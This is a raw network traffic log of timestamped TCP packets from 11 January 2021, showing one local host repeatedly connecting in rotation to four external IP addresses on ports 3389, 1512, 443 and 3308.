Jan 11, 2021 16:53:14.901777983 CET	49273	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:14.907243013 CET	49273	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:14.961416006 CET	3389	49273	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:15.018573999 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.071453094 CET	1512	49274	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:15.071574926 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.072737932 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.125559092 CET	1512	49274	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:15.133770943 CET	1512	49274	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:15.133815050 CET	1512	49274	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:15.133904934 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.133944988 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.151073933 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.205220938 CET	1512	49274	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:15.207171917 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.217057943 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.217144966 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.269989014 CET	1512	49274	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:15.270132065 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.308736086 CET	1512	49274	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:15.322830915 CET	1512	49274	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:15.322845936 CET	1512	49274	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:15.419836998 CET	1512	49274	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:15.419873953 CET	1512	49274	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:15.419943094 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.419981956 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.425312996 CET	49274	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:15.478126049 CET	1512	49274	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:15.544154882 CET	49275	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:15.596467972 CET	443	49275	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:15.596695900 CET	49275	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:15.598275900 CET	49275	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:15.650291920 CET	443	49275	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:15.664871931 CET	443	49275	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:15.664971113 CET	49275	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:15.679330111 CET	49275	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:15.734258890 CET	443	49275	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:15.734409094 CET	49275	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:15.745073080 CET	49275	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:15.745487928 CET	49275	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:15.797569990 CET	443	49275	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:15.797719955 CET	49275	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:15.834867954 CET	443	49275	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:15.849842072 CET	443	49275	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:15.965908051 CET	443	49275	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:15.965945959 CET	443	49275	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:15.966011047 CET	49275	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:15.966044903 CET	49275	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:15.971589088 CET	49275	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:16.023904085 CET	443	49275	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:16.107279062 CET	49276	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:16.150676012 CET	3308	49276	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:16.150861025 CET	49276	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:16.152486086 CET	49276	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:16.195991993 CET	3308	49276	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:16.206336975 CET	3308	49276	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:16.206356049 CET	3308	49276	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:16.206592083 CET	49276	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:16.220412016 CET	49276	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:16.265218019 CET	3308	49276	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:16.265311003 CET	49276	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:16.269263983 CET	49276	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:16.269285917 CET	49276	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:16.312433958 CET	3308	49276	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:16.312508106 CET	49276	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:16.351783037 CET	3308	49276	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:16.355576038 CET	3308	49276	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:16.355590105 CET	3308	49276	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:16.467047930 CET	3308	49276	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:16.467081070 CET	3308	49276	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:16.467159986 CET	49276	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:16.467195988 CET	49276	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:16.472157955 CET	49276	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:16.516398907 CET	3308	49276	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:16.589490891 CET	49277	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:16.643079042 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:16.643161058 CET	49277	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:16.644418001 CET	49277	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:16.699723005 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:16.742399931 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:16.742460012 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:16.742479086 CET	49277	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:16.742511988 CET	49277	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:16.753293991 CET	49277	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:16.809568882 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:16.816646099 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:16.816730976 CET	49277	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:16.822010994 CET	49277	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:16.822105885 CET	49277	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:16.877202988 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:16.877290964 CET	49277	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:16.915668964 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:16.930660009 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:16.930685997 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:17.023252964 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:17.023294926 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:17.023437023 CET	49277	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:17.027694941 CET	49277	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:17.081315041 CET	3389	49277	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:17.132504940 CET	49278	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:17.150214911 CET	49167	80	192.168.2.22	160.153.133.116
Jan 11, 2021 16:53:17.185452938 CET	1512	49278	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:17.185636997 CET	49278	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:17.186357975 CET	49278	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:17.239160061 CET	1512	49278	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:17.247267962 CET	1512	49278	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:17.247298956 CET	1512	49278	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:17.247458935 CET	49278	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:17.247519016 CET	49278	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:17.261605978 CET	49278	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:17.315685034 CET	1512	49278	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:17.316004992 CET	49278	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:17.326412916 CET	49278	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:17.326499939 CET	49278	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:17.379328966 CET	1512	49278	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:17.380599022 CET	49278	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:17.416532993 CET	1512	49278	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:17.433401108 CET	1512	49278	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:17.533329964 CET	1512	49278	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:17.533365965 CET	1512	49278	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:17.533720970 CET	49278	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:17.539429903 CET	49278	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:17.592248917 CET	1512	49278	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:17.651881933 CET	49279	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:17.703810930 CET	443	49279	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:17.703948021 CET	49279	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:17.705162048 CET	49279	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:17.757011890 CET	443	49279	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:17.771724939 CET	443	49279	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:17.772011995 CET	49279	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:17.785695076 CET	49279	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:17.840049982 CET	443	49279	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:17.840341091 CET	49279	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:17.850285053 CET	49279	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:17.850503922 CET	49279	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:17.902395964 CET	443	49279	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:17.902623892 CET	49279	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:17.938802958 CET	443	49279	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:17.954535961 CET	443	49279	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:18.072808027 CET	443	49279	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:18.072848082 CET	443	49279	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:18.073046923 CET	49279	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:18.079078913 CET	49279	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:18.131000042 CET	443	49279	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:18.201442957 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.244837046 CET	3308	49280	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:18.245166063 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.246629953 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.289736986 CET	3308	49280	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:18.300833941 CET	3308	49280	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:18.300878048 CET	3308	49280	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:18.300951958 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.300985098 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.315282106 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.360182047 CET	3308	49280	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:18.360328913 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.370663881 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.371109009 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.414295912 CET	3308	49280	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:18.414510965 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.456321001 CET	3308	49280	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:18.457581997 CET	3308	49280	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:18.457657099 CET	3308	49280	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:18.571816921 CET	3308	49280	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:18.571834087 CET	3308	49280	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:18.571873903 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.571892977 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.574537039 CET	49280	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:18.617469072 CET	3308	49280	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:18.676837921 CET	49281	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:18.730902910 CET	3389	49281	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:18.731021881 CET	49281	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:18.738812923 CET	49281	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:18.793586969 CET	3389	49281	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:18.829974890 CET	3389	49281	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:18.830018997 CET	3389	49281	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:18.830126047 CET	49281	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:18.837277889 CET	49281	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:18.912816048 CET	3389	49281	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:18.913163900 CET	49281	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:18.923585892 CET	49281	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:18.923780918 CET	49281	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:18.977225065 CET	3389	49281	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:18.977560043 CET	49281	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:19.019336939 CET	3389	49281	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:19.034419060 CET	3389	49281	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:19.034467936 CET	3389	49281	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:19.125658035 CET	3389	49281	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:19.125705957 CET	3389	49281	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:19.125901937 CET	49281	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:19.125984907 CET	49281	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:19.131501913 CET	49281	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:19.184814930 CET	3389	49281	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:19.242954969 CET	49282	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:19.296201944 CET	1512	49282	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:19.296372890 CET	49282	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:19.297908068 CET	49282	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:19.350841045 CET	1512	49282	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:19.358053923 CET	1512	49282	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:19.358088017 CET	1512	49282	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:19.358202934 CET	49282	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:19.358268976 CET	49282	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:19.372035980 CET	49282	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:19.426214933 CET	1512	49282	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:19.426496983 CET	49282	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:19.436731100 CET	49282	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:19.437141895 CET	49282	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:19.490030050 CET	1512	49282	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:19.490187883 CET	49282	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:19.528757095 CET	1512	49282	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:19.543019056 CET	1512	49282	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:19.543057919 CET	1512	49282	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:19.642417908 CET	1512	49282	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:19.642468929 CET	1512	49282	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:19.642683983 CET	49282	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:19.648354053 CET	49282	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:19.701525927 CET	1512	49282	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:19.756150961 CET	49283	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:19.808585882 CET	443	49283	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:19.808756113 CET	49283	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:19.810250044 CET	49283	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:19.862272024 CET	443	49283	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:19.877722025 CET	443	49283	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:19.877856970 CET	49283	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:19.893326998 CET	49283	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:19.949682951 CET	443	49283	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:19.949915886 CET	49283	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:19.960454941 CET	49283	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:19.960867882 CET	49283	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:20.015260935 CET	443	49283	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:20.015495062 CET	49283	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:20.067835093 CET	443	49283	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:20.185652018 CET	443	49283	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:20.185698986 CET	443	49283	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:20.185935020 CET	49283	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:20.188848019 CET	49283	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:20.240967989 CET	443	49283	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:20.304050922 CET	49284	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:20.347389936 CET	3308	49284	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:20.347636938 CET	49284	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:20.349107027 CET	49284	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:20.392297983 CET	3308	49284	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:20.406205893 CET	3308	49284	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:20.406260967 CET	3308	49284	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:20.406428099 CET	49284	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:20.424444914 CET	49284	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:20.469809055 CET	3308	49284	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:20.470175028 CET	49284	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:20.479248047 CET	49284	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:20.479419947 CET	49284	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:20.522500038 CET	3308	49284	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:20.522867918 CET	49284	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:20.562167883 CET	3308	49284	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:20.566144943 CET	3308	49284	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:20.566185951 CET	3308	49284	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:20.678051949 CET	3308	49284	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:20.678118944 CET	3308	49284	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:20.678453922 CET	49284	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:20.684048891 CET	49284	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:20.727332115 CET	3308	49284	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:20.800944090 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:20.855345011 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:20.855470896 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:20.856210947 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:20.913909912 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:20.953401089 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:20.953450918 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:20.953512907 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:20.953561068 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:20.962444067 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:21.016983032 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:21.030751944 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:21.031002998 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:21.040478945 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:21.040577888 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:21.097551107 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:21.100500107 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:21.137180090 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:21.154387951 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:21.154422998 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:21.248429060 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:21.248481989 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:21.248620033 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:21.248681068 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:21.254257917 CET	49285	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:53:21.308703899 CET	3389	49285	5.100.228.233	192.168.2.22
Jan 11, 2021 16:53:21.364562988 CET	49286	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:21.417329073 CET	1512	49286	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:21.417448044 CET	49286	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:21.419224977 CET	49286	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:21.471838951 CET	1512	49286	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:21.479114056 CET	1512	49286	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:21.479135990 CET	1512	49286	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:21.479255915 CET	49286	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:21.494971991 CET	49286	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:21.549072981 CET	1512	49286	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:21.553930044 CET	49286	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:21.564212084 CET	49286	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:21.564364910 CET	49286	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:21.617122889 CET	1512	49286	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:21.617338896 CET	49286	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:21.656630039 CET	1512	49286	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:21.670371056 CET	1512	49286	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:21.670416117 CET	1512	49286	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:21.768611908 CET	1512	49286	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:21.768656969 CET	1512	49286	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:21.768815994 CET	49286	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:21.774369955 CET	49286	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:53:21.827081919 CET	1512	49286	46.105.131.65	192.168.2.22
Jan 11, 2021 16:53:21.895425081 CET	49287	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:21.947782993 CET	443	49287	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:21.947973967 CET	49287	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:21.958909035 CET	49287	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:22.011187077 CET	443	49287	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:22.025923014 CET	443	49287	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:22.026074886 CET	49287	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:22.040208101 CET	49287	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:22.095101118 CET	443	49287	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:22.095288038 CET	49287	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:22.105655909 CET	49287	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:22.106153011 CET	49287	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:22.158375025 CET	443	49287	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:22.158694029 CET	49287	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:22.211040020 CET	443	49287	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:22.327229977 CET	443	49287	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:22.327292919 CET	443	49287	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:22.327656031 CET	49287	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:22.333439112 CET	49287	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:53:22.385628939 CET	443	49287	77.220.64.37	192.168.2.22
Jan 11, 2021 16:53:22.456504107 CET	49288	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:22.499773979 CET	3308	49288	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:22.499967098 CET	49288	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:22.501492977 CET	49288	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:53:22.544523001 CET	3308	49288	80.86.91.27	192.168.2.22
Jan 11, 2021 16:53:22.557123899 CET	3308	49288	80.86.91.27	192.168.2.22
